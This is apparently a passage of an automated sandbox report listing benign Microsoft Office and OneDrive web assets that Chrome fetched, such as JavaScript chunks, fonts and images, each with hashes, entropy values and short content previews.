                                                          Preview:{"s":1000,"n":3,"e":[{"e":"*.fp.measure.office.com","w":1000000,"m":128},{"e":"graph.microsoft.com","w":4,"m":128},{"e":"login.microsoftonline.com","w":4,"m":128},{"e":"m365.cloud.microsoft","w":4,"m":128},{"e":"outlook.cloud.microsoft","w":4,"m":128},{"e":"outlook.office.com","w":20,"m":128},{"e":"outlook.office365.com","w":20,"m":128},{"e":"ow1.res.office365.com","w":20,"m":1},{"e":"pp1.prd.attend.teams.microsoft.com","w":1,"m":128},{"e":"pp1.prd.bmc.teams.microsoft.com","w":1,"m":128},{"e":"tr-ofc-afdwac.office.com","w":10,"m":128},{"e":"tr-ofc-atm.office.com","w":10,"m":128},{"e":"tr-ofc-mira.office.com","w":10,"m":128},{"e":"tr-ooc-acdc.office.com","w":20,"m":128},{"e":"tr-ooc-atm.office.com","w":20,"m":128},{"e":"tr-ooc-fs.office.com","w":4,"m":128},{"e":"tr-ooc-geo.office.com","w":4,"m":128}],"r":["upload.fp.measure.office.com/r.gif","upload.fp.measure.office.com/r.gif","upload2.fp.measure.office.com/r.gif"]}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2521)
                                                          Category:downloaded
                                                          Size (bytes):2526
                                                          Entropy (8bit):4.382603392567219
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BFB109198DCE3BEB2B4EC1A04ADE7F8D
                                                          SHA1:2F6E3B222C7CAA79E3F5773CA77F87394478F241
                                                          SHA-256:AB12E738667843E2FAA55070179B0E9C0FE8ED753A90C7CE50A201CF50AC3118
                                                          SHA-512:154C293471B668BD2223057B0FAC33DBD22BACADB6F0FD327248267D6E78499E67D3DEEFE7DB4F6DB1B57F2ACC5F470983A08406CB58C1881315FBF555F7D16C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/1180.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[1180],{901180:(e,t,n)=>{n.d(t,{DMk:()=>o,Tt2:()=>i,Wkm:()=>s,id2:()=>r});var a=n(639691);const i=(0,a.U)("Replay20Regular","20",["M4.25 6a7 7 0 1 1-1.24 3.57A.53.53 0 0 0 2.5 9a.47.47 0 0 0-.48.44L2 10a8 8 0 1 0 1.5-4.66V3.5a.5.5 0 0 0-1 0v3c0 .28.22.5.5.5h3a.5.5 0 0 0 0-1H4.25ZM8 7.75a1 1 0 0 1 1.5-.87l3.99 2.25a1 1 0 0 1 0 1.74l-4 2.25A1 1 0 0 1 8 12.25v-4.5ZM13 10 9 7.75v4.5L13 10Z"]),r=(0,a.U)("ScreenPerson20Regular","20",["M4.75 4A2.75 2.75 0 0 0 2 6.75v6.5A2.75 2.75 0 0 0 4.75 16h6.3c.07-.37.23-.7.45-1H4.75C3.78 15 3 14.22 3 13.25v-6.5C3 5.78 3.78 5 4.75 5h10.5c.97 0 1.75.78 1.75 1.75V9.4c.4.23.74.56 1 .94V6.75A2.75 2.75 0 0 0 15.25 4H4.75Zm12.75 8a2 2 0 1 1-4 0 2 2 0 0 1 4 0Zm1.5 4.5c0 1.25-1 2.5-3.5 2.5S12 17.75 12 16.5c0-.83.67-1.5 1.5-1.5h4c.83 0 1.5.67 1.5 1.5Z"]),o=(0,a.U)("Settings20Regular","20",["M1.91 7.38A8.5 8.5 0 0 1 3.7 4.3a.5.5 0 0 1 .54-.13l1.92.68a1 1 0 0 0 1.32-.76l.3
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (22038)
                                                          Category:downloaded
                                                          Size (bytes):125790
                                                          Entropy (8bit):5.530762139619407
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:7192CF4093DF7375F16AE315D120EA0A
                                                          SHA1:7FA63BA20286EB35971A50252ACC2F8BFC925AB9
                                                          SHA-256:D2EAF9F4378FC899CB5B097354D56E8EBB4C0C544E9C0D29B776A683D1597BB2
                                                          SHA-512:3D69A29999A38E8D9762F2F37348E24574B44800842415816C19401AAABA25EF9215B31FD442CB8DCA82BBCEC92A55524EB50173A7CDBCF3F481BFD518996120
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/91939.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[91939],{608733:(e,t,n)=>{var a;n.d(t,{J:()=>i}),function(e){e[e.None=0]="None",e[e.ExternalVideoSharing=1]="ExternalVideoSharing",e[e.PlaybackTranscriptTranslation=2]="PlaybackTranscriptTranslation",e[e.MediaAnalytics=4]="MediaAnalytics",e[e.HighResolutionPlayback=8]="HighResolutionPlayback"}(a||(a={}));var i="OnePlayer.lastWatchedPositionData"}.,813788:(e,t,n)=>{n.d(t,{l:()=>i});var a=n(171125),i={name:"AboutVideoInline",version:n(229103).A,phasesToInit:["BeforeUi"],getPluginInstanceFactory:function(e){return function(t){return(0,a.__awaiter)(void 0,void 0,void 0,function(){return(0,a.__generator)(this,function(a){switch(a.label){case 0:return[4,t("LoadPluginModule",function(){return Promise.all([n.e(79628),n.e(92946),n.e(64838),n.e(19533),n.e(69648),n.e(30981)]).then(n.bind(n,184305))})];case 1:return[2,a.sent().createPluginInstance(e)]}})})}}}}.,69059:(e,t,n)=>{n.d(t,{m:()=>i});var a=n(17
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4747)
                                                          Category:dropped
                                                          Size (bytes):29646
                                                          Entropy (8bit):5.39881679346836
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FF58D78028189479F741913DBC4251F1
                                                          SHA1:F3A305FD40434B3CC1859A9E0A1D0731B870698D
                                                          SHA-256:0093F101CB1F485FF960F7EC555CBEBE49ACC9FA53D020741FFF421F5D5FFBB6
                                                          SHA-512:44A8A485F49AC1081C7881812EB86032FC2029035C55A9D49769713296C0338FA5C5CF343CB31B84AA43A233F611774E5357FD8E7F2FDF167E568E02083ABFAF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[150],{2742:function(e,t,n){"use strict";n.d(t,{a:function(){return l}});var a=n("tslib_538"),i=n("react-lib"),r=n("fui.core_932"),o=n(345),s=n("fui.util_175"),c=n(2740),d=n(2741);function l(e,t){void 0===t&&(t={});var n=t.factoryOptions,l=(void 0===n?{}:n).defaultProp,f=function(n){var c,d,l,f,p=(c=t.displayName,d=i.useContext(o.a),l=t.fields,f=["theme","styles","tokens"],s.Vs.getSettings(l||f,c,d.customizations)),m=t.state;m&&(n=(0,a.q5)((0,a.q5)({},n),m(n)));var _=n.theme||p.theme,h=u(n,_,t.tokens,p.tokens,n.tokens),b=function(e,t,n){for(var a=[],i=3;i<arguments.length;i++)a[i-3]=arguments[i];return r.Akq.apply(void 0,a.map(function(a){return"function"==typeof a?a(e,t,n):a}))}(n,_,h,t.styles,p.styles,n.styles),g=(0,a.q5)((0,a.q5)({},n),{styles:b,tokens:h,_defaultStyles:b,theme:_});return e(g)};return f.displayName=t.displayName||e.name,l&&(f.create=(0,c.a)(f,{defaultProp:l})),(0,d.a)(f,t.statics),f}function u(e,t){for(v
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (23194)
                                                          Category:downloaded
                                                          Size (bytes):78119
                                                          Entropy (8bit):5.547127843245635
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9D6424082641102EA9D75832977DF0B9
                                                          SHA1:3EA061C5F63487E0FEC4F29F0485053593E7D48F
                                                          SHA-256:6CCF4D8C17279A667CB0524AC4B320F75D6E91BFAB11EC93981E08E5320B991C
                                                          SHA-512:0D0C2DDC306CD65260D07D21E582390587240ED6EDAC32067AB2769BC771E8415A77CD4F8C42F0C20486D21574691FC548B3D2214FA79AACB0316F57F650D019
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/3517.js
                                                          Preview:/*! For license information please see 3517.js.LICENSE.txt */."use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[3517],{139085:(e,t,n)=>{function a(e){for(var t,n=0,a=0,i=e.length;i>=4;++a,i-=4)t=1540483477*(65535&(t=255&e.charCodeAt(a)|(255&e.charCodeAt(++a))<<8|(255&e.charCodeAt(++a))<<16|(255&e.charCodeAt(++a))<<24))+(59797*(t>>>16)<<16),n=1540483477*(65535&(t^=t>>>24))+(59797*(t>>>16)<<16)^1540483477*(65535&n)+(59797*(n>>>16)<<16);switch(i){case 3:n^=(255&e.charCodeAt(a+2))<<16;case 2:n^=(255&e.charCodeAt(a+1))<<8;case 1:n=1540483477*(65535&(n^=255&e.charCodeAt(a)))+(59797*(n>>>16)<<16)}return(((n=1540483477*(65535&(n^=n>>>13))+(59797*(n>>>16)<<16))^n>>>15)>>>0).toString(36)}n.d(t,{A:()=>a})}.,4737:(e,t,n)=>{n.d(t,{$xS:()=>i,AoI:()=>d,Dw0:()=>u,IyI:()=>a,Vpb:()=>c,d0c:()=>p,i5x:()=>f,ipd:()=>m,mam:()=>l,mzo:()=>r,pkM:()=>s,xd$:()=>o,yf9:()=>_});const a="Enter",i=" ",r="Tab",o="ArrowDown",s="ArrowLeft",c="ArrowRight",d="ArrowUp",l="End",u
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (6813)
                                                          Category:downloaded
                                                          Size (bytes):21114
                                                          Entropy (8bit):5.479744993124825
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F214AD42691A6409B60A695E7C13A21C
                                                          SHA1:E0C993974E2F0D63CC5D787613336370EE3272CF
                                                          SHA-256:5E1A1B5D6D9531ED3439F67A2143F0CFA2CA21FA1250D8472C2C11CA68C140A5
                                                          SHA-512:BAD4BA66D4E3B8D9C64D8C87855B46C1AE0D2832EBA6991EEA068C0A340B43E27A2D9FCD50AB51B13EAF861F3C66D6B7A966DD978DE790818F16408959651A4B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/681.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[681],{6763:function(e,t,n){n.r(t),n.d(t,{Persona:function(){return a.a},PersonaBase:function(){return i.a},PersonaCoin:function(){return r.a},PersonaCoinBase:function(){return o.a},PersonaInitialsColor:function(){return s.a},PersonaPresence:function(){return s.b},PersonaSize:function(){return s.c},getPersonaInitialsColor:function(){return c.a},personaPresenceSize:function(){return d.a},personaSize:function(){return d.b},presenceBoolean:function(){return d.c},sizeBoolean:function(){return d.d},sizeToPixels:function(){return d.e}});var a=n(5163),i=n(5164),r=n(3335),o=n(3336),s=n(2639),c=n(2649),d=n(3067)}.,5164:function(e,t,n){n.d(t,{a:function(){return h}});var a=n("tslib_538"),i=n("react-lib"),r=n(29),o=n(375),s=n(49),c=n(477),d=n(478),l=n(3335),u=n(2639),f=n(127),p=n(138),m=(0,r.a)(),_={size:u.c.size48,presence:u.b.none,imageAlt:"",showOverflowTooltip:!0},h=i.forwardRef(function(e,t){var n=(0,o.a)(_,e),r=i.u
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 17724, version 1.3277
                                                          Category:downloaded
                                                          Size (bytes):17724
                                                          Entropy (8bit):7.980344924551899
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1CBD0775F4DC387F389A6EE4A3257463
                                                          SHA1:14C989A6C053FBC7797264C671FE6DB2020EF913
                                                          SHA-256:B1AAA4BA52ADC597DBB8D73FA4CCFCA99CC45134B0D1E49DF3712CF675E7189A
                                                          SHA-512:F49087AAF5EB704DB3C7218BD0BE87B03A61D647B8D1D5903C9CCBFAB372811F5B56F4981F4DBE4870005AB7D78060DB022893261E3DED7650E2C8948FF989C4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/odsp-next-icons-9-e252879f.woff
                                                          Preview:wOFF......E<......wx........................OS/2.......G...`4.u.cmap...P...!....@.9.gasp...t............glyf......=o..g.G...head..?....5...6#.hhea..@(.......$....hmtx..@H...W.....^..loca..@............maxp..Al....... .t..name..A........O..R.post..E(....... ....x.c`a..8...........L..t.!.I.(......@9......VP`pxs....0.B2..@x....]5.z.x....+.q......qY...(I~\........r.HI..n......\..Z_.....FBN.O[..qy.y....U...I.;D.).I.r...=+.. ......bh^)Tt.C/...Nv......G.c....8...r.!...MF....y....0.....[.....X...m.1.....3.u..j.5.l1Zr...:.u.+...~..-...Kw...|.&..F<k.G<......p.....`.i...$B8.. ...........$"...aw...Z.r.J....k..................x..}.|....V+Y...uY.|I.%K.!..._I|$N.;v.."79.I8r.%\..)!@....... ..Ii).o9[hK.......fV..'}.....D{.....w..l....@v......r6..q6.uq;...l.?.l.-.$...........!p#.a...r..T..$G..2C|.qZ5.....:h.t.*R..n.J..*.)....l:..n.2.....Z.@.?.ZT<m8..%8.C..iA.d*.Z..[.*c.h.6$..[.P..,.^..%.A...ZG.a..}..\.GQ.e.....,..........!?}.7?.{.}....B`xZ1#......Sr6#..m.}.5..2.V.....
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:RIFF (little-endian) data, Web/P image
                                                          Category:downloaded
                                                          Size (bytes):36146
                                                          Entropy (8bit):7.99251324975053
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:E243D03BB4BDFB80FC2B9C40863299C5
                                                          SHA1:7ABEBA96529B293239DA5536D4260EFA1E797AD9
                                                          SHA-256:A8283E1B2CABD16BE04A6CB0A292E532D5B74520123E09C2CD9DEB9ECCF2D1EB
                                                          SHA-512:7BDA56879F1873647EDF1B3D18E468430FA9A03AC88E8AC5209E834DE13B7C0FD195F684F7AFDE8E526B4993C1DEBCDF6373357B925B423AFCC37D76EE5C0F41
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/error/error_exclamation_v3_dark.webp
                                                          Preview:RIFF*...WEBPVP8X..............ALPH.a.....n..l/usM....=!.....J.j.!....I6.."..D4Il.l...w.@f......x..$..6Y..m.u.x..U.............$.@.9..M......"b......Q..)S.|..7.r.3....M[.....U..Z%..>.F.m$I....?..S...^..1.W...l.n.H.@.../..G.._.$.m.Nos.}.>1CN5P..2.@J..J.T.fffffffff.{...a5.5Zk..u..&#..$.v...}....{.14..k.I..X....H#.b..e............e..eff23.%.p..*.2......Y.$.ms....hn.HI.b.{]~.........H..m.c..t.....z....C.L... \.HBx.HZw+".7....... ,9..xv.A........A.G.0..g..."Nw.pBt..kE.....Qb.....i.A<..p....ax..+,.......4..H............(..c..."g.....8J.K[....g..4...&.(Y>.o...t|W..=...s...&\.[?.&B.&..'.QKV...x.....1i....T3...........&>S.H;..._......c..?y..r...........x.GmI.PR/.4#.w..Bx...."h.u...G..........n.D......`.x.m..ui~.q....2....u...O..f.u.F..O.B=.m.B^....R...*...x.t..&..V..r....d$.z\<?5..7I..Z....E...q.T..GbM..t.".H..l?L.@...<.~.+]?.I...>.E..t^...q..|H....h..](..Gcx..\..|...t.!.GcR..Q..H.2...j.t....&..`..j...D1Q*.^d.Z.;v.g...:...o..h..I.qI.M...\...q
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 2524, version 4.-22282
                                                          Category:downloaded
                                                          Size (bytes):2524
                                                          Entropy (8bit):7.618213756571514
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E584E160AA097D164ABF9AE6D7DFD291
                                                          SHA1:72389F2E647146C37219E9E08508EDFFF48DD99F
                                                          SHA-256:BA4E0CBDDF9AE44844DB7FE4263E61E3E155F7C8A809FB25D7336755C436786E
                                                          SHA-512:8E48544F773A0BDFD3C8B68E9A2EBBCB973713FA230B695304E7B3695CA8F2743BEA1C48AE424744CB8B8B64A3CE7E0DC30BCC6FA71EFA94331272AB529461E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/patch/odsp-patch-icons-33e61432.woff
                                                          Preview:wOFF...............d........................OS/2...D...H...`0.x.cmap.......?...R..-cvt ....... ...*....fpgm...........Y...gasp................glyf..............l/head.......4...6.P.-hhea...........$....hmtx.............*..loca.............\. maxp...(....... ....name...D...........Upost...<....... .Q.|prep...P........x...x.c`a.c......:....Q.B3_dHc..`e.bdb... .`@..`....gM.os.........S``......x.c```f.`..F.......|... ...L....M.x... ...l.,.S....F6....{....x.c.b.e(`h`X.......x............x.]..N.@..s$..'@:!.u*C....K$.%%...J.......n..b.........|.s...|v..G*)V.7........!O.6eaL.yV.e.j..kN..M.h....Lm....-b....p.N.m.v.....U<..#...O.}.K..,V..&...^...L.c.x.....?ug..l9e..Ns.D....D...K........m..A.M....a.....g.P..`....d.............x....j.Q...s.m:....m.@'..t.P+..0..6..H.MV.d.M]d.P.H9.B...]..}.../....n..MigF.8q..x........p.0w.9...@]iU.J....8..C.....>.A..&....PNi..K..J{u......m.....6.e{.?..C"..oM..6~.<..C@.Vc....}........g...3.....g.+Z9*.:....?S.<U.%ih..z..OP.%.tM.t..tM......$.E.6
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):365066
                                                          Entropy (8bit):5.494399463762399
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:60685E759E8921FC9BB275174CBE7EB5
                                                          SHA1:50E3E0A2359035E06371B83449D8D3852611B1B5
                                                          SHA-256:1ECFD2BFB76B5EC5AD9681CF3B1EBD8E69AD3B3CEBA5714E0BB4DFD8E7C49BA8
                                                          SHA-512:75073EA2E018F4535A432C3D5CD07CD48208F5D8996ED3166ADA8057743A9B515DB2AF22030918614F77ED20626ACAE4B8B27CEBE815EE898432A5CC3AD81463
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.components.migration.shims/fui.lcoms-d8538824.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lcoms"],{"fui.lcoms_357":(e,t,n)=>{n.d(t,{Z2l:()=>So,GUX:()=>Do,O82:()=>Ve,R7j:()=>gp,IJI:()=>Jr,ke_:()=>va,HTL:()=>Gs,Q76:()=>zi,fiU:()=>Gi,tMl:()=>ie,acq:()=>Ne,jap:()=>vp,ayJ:()=>Xa,M5q:()=>oi,rwb:()=>Ka,JnP:()=>Wa,mlp:()=>Ba,LTm:()=>nr,PxE:()=>Mi,AqT:()=>Li,Ag2:()=>er,deM:()=>yt,y01:()=>Op,PPU:()=>Ct,y9w:()=>Ep,eot:()=>eo,NQC:()=>Ys,W$I:()=>$r,Xt2:()=>Lo,HIv:()=>Bt,eHX:()=>Ap,WJ4:()=>Jo,KA$:()=>Xo,syJ:()=>_n,Aou:()=>Sp,NSp:()=>fn,lob:()=>pn,XqA:()=>mn,qSk:()=>Lp,aeZ:()=>yp,uNQ:()=>rn,$p$:()=>hn,Ydp:()=>Dp,LPH:()=>Sm,THZ:()=>Dm,a47:()=>Im,okj:()=>vm,mv6:()=>ym,txZ:()=>xm,hlF:()=>On,yi_:()=>Cm,Gps:()=>zn,USc:()=>Tn,XPZ:()=>Pn,oYd:()=>Mn,WHN:()=>Lr,M9C:()=>Om,j3W:()=>Dr,f1D:()=>Vn,fd2:()=>Nn,yKn:()=>Mr,xtb:()=>Ip,B5u:()=>Wr,sZV:()=>wm,o33:()=>Pr,uR6:()=>Qs,n0i:()=>Vi,goB:()=>Dd,FEL:()=>Ad,JUA:()=>cd,N1x:()=>ol,HRK:()=>md,jp5:()=>ms,HzX:()=>Em,Uid:()=>rs,FQl:()=>jn,wj:()=>hp,BHr:()=>n_,ANW:()=>Sn,v9C:()=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):23079
                                                          Entropy (8bit):4.432934939593491
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:75B8157A5F177E510FF6576EBD12D5AF
                                                          SHA1:5B510F99DC9737E06EF3634EDABC83CC74AD1BC2
                                                          SHA-256:D0688F2F7BD9653049F9AAA77A5E143E3A75C3A9E09134F6A134DA2FAC9A77CE
                                                          SHA-512:F91AB0FB913A4E912D2891FB45388330D1094346CDD7F3DE7F8C58A82645409C462016C5E6792886DAEF6D6CC542F4743A1EBF93360989F49DB5D8FA166F60BF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_recent_v2_dark.svg
                                                          Preview:<svg id="GRAPHICS" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="208" height="208" viewBox="0 0 208 208"><defs><radialGradient id="radial-gradient" cx="2388.356" cy="120.437" fx="2396.5457577691936" r="8.378" gradientTransform="matrix(0.99, 0.02, -0.02, 1, -2216.113, -48.357)" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e1dfdd"/><stop offset="0.335" stop-color="#e1dfdd"/><stop offset="0.61" stop-color="#c6c4c2"/><stop offset="1" stop-color="#e1dfdd"/></radialGradient><radialGradient id="radial-gradient-3" cx="779.925" cy="84.048" r="28.576" gradientTransform="matrix(0.995, -0.104, 0.105, 1.003, -717.608, 143.499)" gradientUnits="userSpaceOnUse"><stop offset="0.338" stop-color="#797673"/><stop offset="0.513" stop-color="#979592"/><stop offset="0.701" stop-color="#b1afac"/><stop offset="0.869" stop-color="#c1bebc"/><stop offset="1" stop-color="#c6c4c2"/></radialGradient></defs><path d="M92.607,174.022c-47.885,39.353-121.684.073-75.3
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (13258)
                                                          Category:downloaded
                                                          Size (bytes):26209
                                                          Entropy (8bit):5.412677084514984
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3404F61DC0A7019E8486FB5A4CD4016F
                                                          SHA1:E813FDE98C643EBE013CC95C6A405A8014583ACB
                                                          SHA-256:2757477CA3A06F091831294ECA0310A53B3B626A7358AB6DB6928B478E71B79C
                                                          SHA-512:D8AD22A84671C3920F0A05EF7F933B915F558D8822262A34D94162546C8F6C4568E4AAAFCB7B163B99F3CA03927FCE42E3E9D709562BF57ECDBC25EBF5A01B84
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/396.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[396],{3008:function(e,t,n){var a=n(21),i=n(126),r=function(){function e(e){this.concurrency=e||1,this._running=0,this._queue=[],this._promiseComplete=this._promiseComplete.bind(this)}return e.prototype.enqueue=function(e){var t;if(this._running<this.concurrency)this._running++,(t=e()).then(this._promiseComplete,this._promiseComplete);else{var n={callback:e,signal:null,canceled:!1,result:null};n.signal=new i.b(function(){n.canceled=!0,a.c.is(n.result)&&n.result.cancel()}),this._queue.push(n),t=n.signal.getPromise()}return a.c.resolve(t)},e.prototype._promiseComplete=function(){var e=this;if(this._running--,this._running<this.concurrency&&this._queue.length){for(var t=this._queue.shift();t&&t.canceled;)t=this._queue.length?this._queue.shift():null;t&&(this._running++,t.result=t.callback(),t.result.then(function(n){t.signal.complete(n),e._promiseComplete()},function(n){t.signal.error(n),e._promiseComplete()}))}}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4142)
                                                          Category:downloaded
                                                          Size (bytes):9804
                                                          Entropy (8bit):5.196079790572181
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:49CC81E1A55B126437DEE4B0F21B7DAB
                                                          SHA1:838AC358323AA152E8418C67B1B3508685F55BE3
                                                          SHA-256:D3C74AC5881238DDB3FEAD86EA1BAE2AA8F135E8E8AA4AF1E250B5E0D9F7EE43
                                                          SHA-512:1BDCE9AAD20507A49252AAD710217FE0880BC764049AC5AF0B8B0E7722D94218F5097931E4AE4FD6EA0175757D63897B5B9956D6CBC0ECCAE5BEBB41BEEAAD39
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/352.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[352,2143],{2558:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i}});var a,i={queued:0,started:1,completed:2,aborted:3,failed:4,none:5};!function(e){e[e.none=0]="none",e[e.other=1]="other",e[e.general=2]="general",e[e.conflict=3]="conflict",e[e.similarNameExists=4]="similarNameExists",e[e.invalidName=5]="invalidName",e[e.fileSize=6]="fileSize",e[e.emptyFileOrFolder=7]="emptyFileOrFolder",e[e.emptyFileOrFolderForDocLib=8]="emptyFileOrFolderForDocLib",e[e.overQuota=9]="overQuota",e[e.accessDenied=10]="accessDenied",e[e.lockMismatch=11]="lockMismatch",e[e.overQuotaSharedFolder=12]="overQuotaSharedFolder",e[e.folderUploadNotSupported=13]="folderUploadNotSupported",e[e.versionMismatch=14]="versionMismatch",e[e.authFailure=15]="authFailure",e[e.fileHashMismatch=16]="fileHashMismatch",e[e.targetFolderMissing=17]="targetFolderMissing",e[e.itemNotFound=18]="itemNotFound",e[e.malwareDetected=19]="malw
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (9706)
                                                          Category:downloaded
                                                          Size (bytes):526560
                                                          Entropy (8bit):5.0371559641626815
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:72FE9650FECC4C2EB136AF27D46B1BAA
                                                          SHA1:F270EAEBAAB4572C8F180E4DD0DFACE0AE21C13B
                                                          SHA-256:6749DC53A6AC504B11198632BD9D6A5B72CFBE1957DB2267E4961197FC318B3B
                                                          SHA-512:9C83A0F5A643920EBD3F5BAA53E1E2388963A7549F95D66862AE05E9BB38AFC4705006A3871828332EC7E01A9437151E7E8444E40507D52701B16941022ECF79
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/file-browser-odb-meta-os/en-us/ondemand.resx.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{8482:e=>{e.exports=JSON.parse('{"needsPasswordLabel":"{0} requires a password.","enterPassword":"Enter password","enterPasswordDialogLabel":"Enter password to open this PDF file","invalidPasswordPrompt":"Incorrect password. Please try again.","dialogOk":"OK","dialogCancel":"Cancel","zoomPageFitSize":"Window size","zoomPageFitWidth":"Window width","previousPageTooltip":"Previous page","nextPageTooltip":"Next page","zoomTooltip":"Zoom","zoomOutTooltip":"Zoom out","zoomInTooltip":"Zoom in","rotateTooltip":"Rotate","openInNewWindowTooltip":"Open in new window","searchTooltip":"Search","previousTooltip":"Previous result","nextTooltip":"Next result","upCommandAria":"Go to the previous page.","downCommandAria":"Go to the next page.","zoomCommandAria":"Change the current zoom level. Press enter to open the option menu and esc to close it.","zoomOutCommandAria":"Zoom out the document.","zoomInCommand
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1546)
                                                          Category:downloaded
                                                          Size (bytes):1551
                                                          Entropy (8bit):4.76524039751926
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:76762A129935342A22FA38164C1C25F0
                                                          SHA1:B6CB49D91EC10808E904D5FE5813E7AF4F8930A6
                                                          SHA-256:D32BB8EDD1B979370B0BF3740DE520344EFE99617EC9C905079FBFD54A5B2619
                                                          SHA-512:915F127D45BF14C80E993D34AC06CCF4E3C7F4A52C0DE5EAAC7DEDE9F4AD3B2B9B2338728E5299629464C10C45F92FB3F076E61E5283FA44779C59F87B758EBC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/79526.js
